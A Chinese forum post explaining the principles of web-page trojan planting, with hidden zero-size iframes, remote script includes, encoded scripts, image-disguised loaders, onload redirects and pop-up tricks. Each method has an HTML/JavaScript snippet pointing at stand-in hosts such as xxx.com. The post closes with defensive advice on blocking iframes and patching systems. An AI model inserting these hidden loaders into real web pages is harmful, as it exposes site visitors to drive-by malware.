叫你敢应吗 發表於 2016-5-7 12:31:24

各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)

<p>下面介绍集中常见的网页挂马方式:</p>
<p><strong>(1)iframe 框架挂马</strong></p>
<p>在网页上增加一行挂马的程序,例如:<br />&lt;iframe src=http://www.xxx.com/xxx.html width=0 height=0&gt;&lt;/iframe&gt;<br />这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂马。这行语句就是在网页打开的时候,同时打开另外一个网页,当然这个网页可能包含大量的木马,也可能仅仅是为了骗取流量。<br />如果我们的网页不使用iframe,我们可以屏蔽iframe属性,这样,即使网页被iframe挂马,也不会伤害到访问网站的用户。<br />【原理】:<br />IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。<br />我们在网页中增加如下的代码即可屏蔽iframe属性:</p>
<p>&lt;style type=&rdquo;text/css&rdquo;&gt;<br />iframe{a:expression(this.src=&rsquo;about:blank&rsquo;,this.outerHTML=&rdquo;);}<br />&lt;/style&gt;<br />iframe 也可以采用加密的方式挂马,例如下面的代码:<br />&lt;iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1&gt;&lt;/iframe&gt;</p>
<p><strong>(2)script 挂马</strong></p>
<p>通过script的调用来挂马,可以挂直接的html文件,也可以挂js文件,可以明文挂马,为了躲避追查,也有加密挂马的形式,形式各异,千差万别,主要方式如下:<br />&lt;script src=http://%11%11%11%11%11%11%11&gt;&lt;/script&gt;<br />这是一个加密的挂马语句;<br />2.1 htm文件挂马:</p>
<p>通过上传一个木马文件(x.htm)挂马,代码如下:<br />document.write(&ldquo;&lt;div style=&rsquo;display:none&rsquo;&gt;&rdquo;)<br />document.write(&ldquo;&lt;iframe src=x.htm width=0 height=0&gt;&lt;/iframe&gt;&rdquo;)<br />document.write(&ldquo;&lt;/div&gt;&rdquo;)<br />htm 挂马代码:<br />&lt;script src=x.htm&gt;&lt;/script&gt;</p>
<p>2.2 js文件挂马</p>
<p>通过上传一个木马文件(x.js)挂马,代码如下:<br />document.write(&ldquo;&lt;iframe width=&rsquo;0&prime; height=&rsquo;0&prime; src=&rsquo;http://xxx.com/xxx.htm&rsquo;&gt;&lt;/iframe&gt;&rdquo;);</p>
<p>&nbsp;<br />JS挂马代码:<br />&lt;script language=javascript src=x.js&gt;&lt;/script&gt;<br />当然也可以挂互联网上任何一台机器的x.js文件;<br />2.3&nbsp; js变形加密<br />&lt;SCRIPT language=&rdquo;JScript.Encode&rdquo; src=http://www.xxx.com/x.x&gt;&lt;/script&gt;</p>
<p><strong>(3)图片伪装挂马</strong></p>
<p>随着防毒技术的发展,图片木马技术逃避杀毒监视的新技术,攻击者将类似:http://www.xxx.com/x.htm中的木马代码植入到x.gif图片文<br />件中,这些嵌入代码的图片都可以用工具生成。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:</p>
<p>&lt;html&gt;<br />&lt;iframe src=&rdquo;http://www.x.com/x.htm&rdquo; height=0 width=0&gt;&lt;/iframe&gt;<br />&lt;img src=&rdquo;http://www.x.com/x.jpg&rdquo;&gt;&lt;/center&gt;<br />&lt;/html&gt;</p>
<p>当用户打开http://www.x.com/x.htm是,显示给用户的是http://www.x.com/x.jpg,而http://www.x.com/x.htm网页代码也随之运行。</p>
<p><strong>(4)其它的挂马方式</strong><br />4.1 body挂马<br />&lt;body onload=&rdquo;window.location=&rsquo;http://xxx.com/xxx.htm&rsquo;;&rdquo;&gt;&lt;/body&gt;<br />也可以在css的body中挂马<br />body {<br />background-image: url(&lsquo;javascript:document.write(&ldquo;&lt;script src=http://www.xxx.com/x.js&gt;&lt;/script&gt;&rdquo;)&rsquo;)}<br />4.2 隐蔽挂马<br />top.document.body.innerHTML = top.document.body.innerHTML +<br />&lsquo;\r\n&lt;iframe src=&rdquo;http://www.xxx.com/xxx.htm/&rdquo;&gt;&lt;/iframe&gt;&rsquo;;<br />4.3 java的open函数挂马<br />直接调用:<br />&lt;SCRIPT language=javascript&gt;<br />window.open (&ldquo;x.htm&rdquo;,&rdquo;&rdquo;,&rdquo;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1&Prime;);<br />&lt;/script&gt;<br />欺骗调用:</p>
<p>&lt;a href=&rdquo;http://www.a.com(迷惑连接地址,显示这个地址指向木马地址)&rdquo; onMouseOver=&rdquo;www_a_com(); return true;&rdquo;&gt; 页面要显示的内容 &lt;/a&gt;<br />&lt;SCRIPT Language=&rdquo;JavaScript&rdquo;&gt;<br />function www_a_com ()<br />{<br />var url=&rdquo;网马地址&rdquo;;<br />open(url,&rdquo;NewWindow&rdquo;,&rdquo;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w<br />idth=800,height=600,left=10,top=10&Prime;);<br />}<br />&lt;/SCRIPT&gt;</p>
<p>4.4 伪装调用:</p>
<p>&lt;frameset rows=&rdquo;444,0&Prime; cols=&rdquo;*&rdquo;&gt;<br />&lt;frame src=&rdquo;a.htm&rdquo; framborder=&rdquo;no&rdquo; scrolling=&rdquo;auto&rdquo; noresize marginwidth=&rdquo;0&Prime;margingheight=&rdquo;0&Prime;&gt;<br />&lt;frame src=&rdquo;b.htm&rdquo; frameborder=&rdquo;no&rdquo; scrolling=&rdquo;no&rdquo; noresize marginwidth=&rdquo;0&Prime;margingheight=&rdquo;0&Prime;&gt;<br />&lt;/frameset&gt;</p>
<p>形形色色的网页挂马,代码都十分简单,所以,互联网木马想要传播,就会不停的开发新的挂马方式,不停的加密隐藏自己,这样才能逃过各种安全软件的眼睛。其实,看看上文,很多语句都是编程常用的代码,只是使用的目的不一样罢了,了解了网页挂马的原理和方法,再防范网页挂马就容易多了。<br />带木马的网页主要包括两种类型:一种自己本身就是木马网站,所有的页面都有木马,另一种是正常的网站,由于管理不善,被挂马,成为木马网站的一个中转站,看看google中这样的网站何其多,可能很多站长现在还不知道,呵呵,多学习学习吧,站长可不是那么好当的。<br />不过,仅仅有了网络挂马的代码,也不一定一定能传播木马,只要我们加强防范,不让我们的网页被 挂马,甚至,即使被挂马了,打开了木马网页,我们的系统没有漏洞,木马网页也同样不能发挥作用的。所以,最重要的安全防范方式就是定期给系统打补丁,几乎 所有的木马网页都无法发挥作用了。</p>
頁: [1]
查看完整版本: 各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)